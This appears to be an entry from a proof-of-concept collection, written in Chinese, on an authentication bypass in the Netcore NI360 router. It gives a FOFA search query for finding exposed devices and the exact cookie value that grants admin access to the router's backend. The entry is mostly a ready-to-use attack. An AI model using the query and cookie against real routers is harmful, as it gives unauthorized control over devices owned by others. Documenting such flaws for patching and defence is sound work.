Awesome-POC/网络设备漏洞/磊科 NI360路由器 认证绕过漏洞.md
Threekiii e9e1a4597a init
2022-02-20 17:08:56 +08:00

512 B
Raw Blame History

磊科 NI360路由器 认证绕过漏洞

漏洞描述

磊科 NI360路由器 存在认证绕过漏洞通过添加特定的Cookie字段获取后台权限

漏洞影响

磊科 NI360路由器

FOFA

title="Netcore"

漏洞描述

登录页面如下

添加 Cookie字段 : netcore_login=guest:1

刷新后登录后台